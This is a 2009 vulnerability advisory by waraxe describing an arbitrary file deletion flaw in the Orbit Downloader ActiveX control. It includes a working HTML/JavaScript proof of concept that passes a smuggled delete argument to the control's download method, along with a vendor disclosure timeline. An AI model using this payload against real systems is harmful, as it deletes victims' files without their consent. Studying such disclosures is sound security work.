[waraxe-2009-SA#073] - Arbitrary File Deletion in Orbit Downloader <= 2.8.7
===============================================================================
Author: Janek Vind "waraxe"
Date: 21. March 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-73.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Orbit Downloader, leader of download manager revolution, is devoted to new
generation web (web2.0) downloading, such as video/music/streaming media from
Myspace, YouTube, Imeem, Pandora, Rapidshare, support RTMP. And to make general
downloading easier and faster.
http://www.orbitdownloader.com/
List of found vulnerabilities
===============================================================================
1. Arbitrary File Deletion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
CLSID: {3F1D494B-0CEF-4468-96C9-386E2E4DEC90}
ProgID: Orbitmxt.Orbit
Executable: orbitmxt.dll
File Version: 2.1.0.2
Tested on following platforms:
1. Windows XP Pro SP3/IE 6 SP1
2. Windows Vista Ultimate 64-bit SP1/IE 7
In both cases IE security settings were default for Internet Zone.
Exploitation tests ended successfully without any warnings or other interaction
from Internet Explorer.
Proof Of Concept:
<html><head>
<title>Orbit Downloader <= 2.8.7 Arbitrary File Deletion PoC by waraxe</title>
<script>
function test()
{
waraxe.download('','','" /Lc:\\test.txt "','',1);
}
</script>
</head><body>
<object
id="waraxe" name="waraxe"
classid="CLSID:3F1D494B-0CEF-4468-96C9-386E2E4DEC90"
width="50" height="50">
</object>
<br><center>
<button onclick="javascript:test();"> Test </button>
</body></html>
For testing first create "test.txt" file to the C: root dir and
then use IE and hit test button. "test.txt" should be deleted for now :)
Disclosure Timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
03/04/09 Developer contacted
03/04/09 Developer's initial response
03/04/09 Findings sent to developer
03/18/09 New version 2.8.7 released, no fix for specific issue!
03/21/09 Public disclosure
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who know me!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
---------------------------------- [ EOF ] ------------------------------------